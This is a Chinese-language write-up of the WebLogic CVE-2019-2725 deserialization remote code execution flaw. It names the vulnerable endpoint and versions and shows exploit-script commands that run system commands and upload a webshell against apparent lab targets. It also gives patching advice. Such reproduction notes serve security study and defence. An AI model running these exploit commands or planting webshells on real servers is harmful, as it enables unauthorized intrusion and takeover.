@[TOC](weblogic 远程代码执行 (CVE-2019-2725))
所有文章,仅供安全研究与学习之用,后果自负!
weblogic 远程代码执行 (CVE-2019-2725)
这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。
0x01 漏洞描述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。
7001端口
漏洞存在于
/_async/AsyncResponseService
0x02 影响范围
weblogic 10.x
weblogic 12.1.3
0x03 漏洞复现
版本为10.4.5
(1)访问 下方url 看是否存在漏洞
ip:7001/_async/AsyncResponseService
http://118.193.36.37:34266/_async/AsyncResponseService
工具利用
https://github.com/TopScrew/CVE-2019-2725
查看使用方法
python weblogic-2019-2725.py
执行命令
用 12.1.3 版本
python weblogic-2019-2725.py 12.1.3 http://118.193.36.37:30735 id
python weblogic-2019-2725.py 12.1.3 http://118.193.36.37:30735 whoami
上传webshll
python weblogic-2019-2725.py 12.1.3 http://118.193.36.37:30735
脚本中的webshlel 可以通过html编码解码 + hackbar修改
vulfocus/weblogic-CVE-2020-14750 10.4.5版本 也用该漏洞通过
0x04 漏洞修复
1、升级本地JDK环境
2、及时安装官方补丁